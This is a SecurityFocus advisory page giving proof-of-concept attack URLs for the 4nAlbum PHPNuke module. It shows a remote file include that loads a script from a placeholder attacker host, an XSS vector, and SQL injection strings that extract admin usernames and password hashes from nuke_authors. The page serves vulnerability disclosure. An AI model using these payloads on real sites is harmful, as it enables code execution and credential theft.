Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

WarpSpeed 4nAlbum Module For PHPNuke Multiple Vulnerabilities

The following proof of concept was provided:

To leverage the remote file include:
http://www.example.com/phpNukeDirectory/modules/4nalbum/public/displaycategory.php?basepath=http://www.example.net/

Where the attacker would have to have malicious code in the script 'http://www.example.net/public/imageFunctions.php'

To leverage the cross-site scripting issue:
http://www.example.com/phpNukeDirectory/modules/4nalbum/public/nmimage.php?z=[xss code here]

To leverage the SQL injection issue:
http://www.example.com/phpNukeDirectory/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,pwd,2,null,null,null%20FROM%20nuke_authors/*
http://www.example.com/phpNukeDirectory/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,aid,2,null,null,null%20FROM%20nuke_authors/*







 

Privacy Statement
Copyright 2009, SecurityFocus